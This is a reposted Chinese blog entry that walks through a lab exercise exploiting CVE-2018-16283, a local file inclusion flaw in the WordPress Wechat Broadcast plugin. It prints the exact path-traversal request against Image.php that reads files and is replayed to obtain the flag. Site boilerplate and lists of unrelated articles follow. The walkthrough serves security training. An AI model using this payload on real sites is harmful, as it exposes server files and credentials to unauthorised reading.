一、靶场介绍
WordPress Plugin Wechat Broadcast LFI
二、复现过程
1、开启靶场
2、进入网页
3、在url输入
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../flag同时抓包获取
4、将数据发送到重放器,点击发送,成功获取到flag
cve-2018-16283
2025/4/16 13:14:27
来源:https://blog.csdn.net/m0_74125616/article/details/147236321
浏览:
次
关键词:cve-2018-16283
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com
完整讲解与实战应用)
)
热文排行
最新新闻
- 一个插件,免费使用所有顶级大模型(Deepseek,Gpt,Grok,Gemini)
- c语言指针(2万多字超详细、全面解析)(⑅•͈ᴗ•͈).:*♡
- 【Qt+opencv】基础的图像绘制
- Java学习手册:Java集合框架详解
- 认识c++(c++入门)
- 使用LVS的 NAT 模式实现 3 台RS的轮询访问
- Android Studio开发知识:从基础到进阶
- 小程序事件系统 —— 33 事件传参 - data-*自定义数据
- [Meachines] [Medium] solidstate Apache JAMES RCE+POP3邮件泄露+定时任务权限提升
- 学透Spring Boot — 013. Spring Web-Flux 函数式风格的控制器
推荐新闻
- 一个插件,免费使用所有顶级大模型(Deepseek,Gpt,Grok,Gemini)
- c语言指针(2万多字超详细、全面解析)(⑅•͈ᴗ•͈).:*♡
- 【Qt+opencv】基础的图像绘制
- Java学习手册:Java集合框架详解
- 认识c++(c++入门)
- 使用LVS的 NAT 模式实现 3 台RS的轮询访问
- Android Studio开发知识:从基础到进阶
- 小程序事件系统 —— 33 事件传参 - data-*自定义数据
- [Meachines] [Medium] solidstate Apache JAMES RCE+POP3邮件泄露+定时任务权限提升
- 学透Spring Boot — 013. Spring Web-Flux 函数式风格的控制器